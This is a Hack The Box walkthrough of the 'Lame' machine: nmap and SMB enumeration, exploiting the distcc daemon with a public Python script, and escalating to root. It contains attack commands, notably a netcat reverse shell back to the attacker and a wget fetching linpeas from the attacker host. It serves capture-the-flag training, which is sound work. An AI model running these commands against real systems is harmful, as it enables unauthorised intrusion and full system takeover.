HTB - Lame

Linux | distcc

Tools For This Room

• Google

TL;DR / Executive Summary

1. Scan and enumerate with nmap

2. Gain foothold by exploiting distcc

3. Privesc by exploiting nmap

Scanning & Enumeration

We'll kick off with an nmap scan. However, we will need to add the ping flag with "-Pn" to get results. Since this will slow down the scan as nmap will treat every port as open, let's limit the scan to the first 10,000 ports.

nmap -sV -sC -vv -Pn -p 1-10000 <IP>

In the background, let's run a second nmap scan on all ports. This will reveal any other ports beyond 10,000 while we enumerate the results of the first nmap scan.

nmap -A -T5 -vv -p- <IP>

We get quite a few open ports with the first nmap scan:

21: FTP 22: SSH 139: Samba smbd 3.x - 4.x 445: Samba smbd 3.0.20-Debian 3632: distccd v1 ((GNU) 4.2.4 (Ubuntu 4.2.4-1ubuntu4))

Let's start by trying to login into FTP anonymously.

FTP <IP>

We're in, but there doesn't seem to be anything here:

Next up is using nmap to enumerate the samba shares at port445.

nmap --script=smb-enum* -p 445 -Pn <IP>

After a bit, we get quite a bit of info. Looks like we have read/write access to 2 shares (IPC$, tmp).

We also find 2 user accounts which are not disabled (msfadmin, just a user,111,,). Lastly, we see that that there could be MySQL and PostgreSQL servers.

Let's see if we can find anything from the smb share:

smbclient //<IP>/IPC$
smbclient //<IP>/tmp

Unfortunately, we can't seem to access them.

We still have one unexplored option left, which is port3632. Let's see what distccd v1 is and what it does:

"In software development, distcc is a tool for speeding up compilation of source code by using distributed computing over a computer network." - Wikipedia

So it turns out distccd is simply the daemon of distcc which is used for compiling. Let's see if there's any way to exploit this.

Gaining Foothold

A quick Google search for vulnerabilities gives us an NSE script, which is a script powered by the Nmap Scripting Engine. There are quite a lot of useful scripts in here and we can even write our own and add to it.

Checking out the Nmap result shows us a script to see if the vulnerability is present on the victim machine. So let's find that script on our attacking machine, and verify that distccd v1 is vulnerable on the victim machine.

locate nmap scripts | grep distcc 2>/dev/null

Now let's run it and see:

nmap --script=distcc-cve2004-2687.nse -p 3632 <IP>

Looks like we've found our way in! Now let's find how to exploit this. Google provides a solution:

Checking out the github by DarkCoderSc gives us a python script. Let's copy that, grant it permissions, and run it.

gedit lame.py
chmod +x lame.py

It's always important to read through the script to understand what it's doing, and in doing so we realize that it's pretty much for this exact HTB box:

Now let's set up our netcat listener:

nc -lvnp 4444

And run our exploit:

./lame.py -t <victimIP> -p 3632 -c "nc <ourIP> 4444 -e /bin/sh"

We've gotten our shell.

Privilege Escalation

First things first, let's stabilize our shell and get more functionalities:

python -c 'import pty;pty.spawn("/bin/bash")'
//ctrl + z//
stty raw -echo && fg
export TERM=xterm

Now let's run our usual array of simple privesc checks such as history, SUID, sudo, etc. But nothing quite pops up. Let's just run linpeas.

Set up a server on our attacking machine:

python -m SimpleHTTPServer

Transfer linpeas over, and run it:

wget <ourIP>:<ourPort>/linpeas.sh
./linpeas.sh

Scrolling through the results, we find an interesting highlight:

Since this is rated at a 95% probability of being a privesc, let's Google to see how we can do that:

Our first result gives us detailed steps on how to achieve this:

A minute later, we are root!

Let's grab that flag and call it a day.